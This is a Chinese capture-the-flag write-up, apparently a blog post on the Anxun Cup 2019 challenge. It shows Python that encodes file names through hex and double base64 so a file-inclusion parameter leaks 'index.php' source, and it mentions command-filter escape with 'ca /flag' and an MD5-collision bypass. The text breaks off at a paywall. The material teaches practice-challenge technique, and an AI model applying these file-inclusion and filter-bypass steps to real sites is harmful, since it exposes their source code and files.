这篇博客详细介绍了在安洵杯2019挑战中,如何利用文件包含漏洞和MD5碰撞来获取flag。首先,博主通过双重base64解码和hex转string获取了文件路径。接着,面对正则表达式的过滤,通过'ca /flag'进行命令逃逸。然后,针对MD5过滤,博主通过精心构造的MD5碰撞字符串a和b,成功绕过限制。最后,强调在提交参数时,a和b不能分开写,避免回车符影响。
文件包含,base64
img=TXpVek5UTTFNbVUzTURabE5qYz0
这里的路径是经过了base64编码的,当时要注意的是这里在解码的时候记得要将末尾被省略掉的’='给加上去(猜测这里在解码的过程中可能有padding)(经过base64编码后个长度为4的倍数)
结果双重base64解码,然后hex 转string 之后就可以得到路径了.
c='TXpVek5UTTFNbVUzTURabE5qYz0='
import base64
from Crypto.Util import number
import binascii
print(binascii.unhexlify(base64.b64decode(base64.b64decode(c)).decode()))
#b'555.png'
于是我们尝试得到index.php的源代码
m='index.php'
from Crypto.Util import number
tmp1=hex(number.bytes_to_long(m.encode()))[2:]
import base64
tmp2=base64.b64encode(tmp1.encode())
print(base64.b64encode(tmp2))
#b'TmprMlpUWTBOalUzT0RKbE56QTJPRGN3'
传这个参数,得到
.
base64解码
<?php
error_reporting(E_ALL || ~</
最低0.47元/天 解锁文章
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
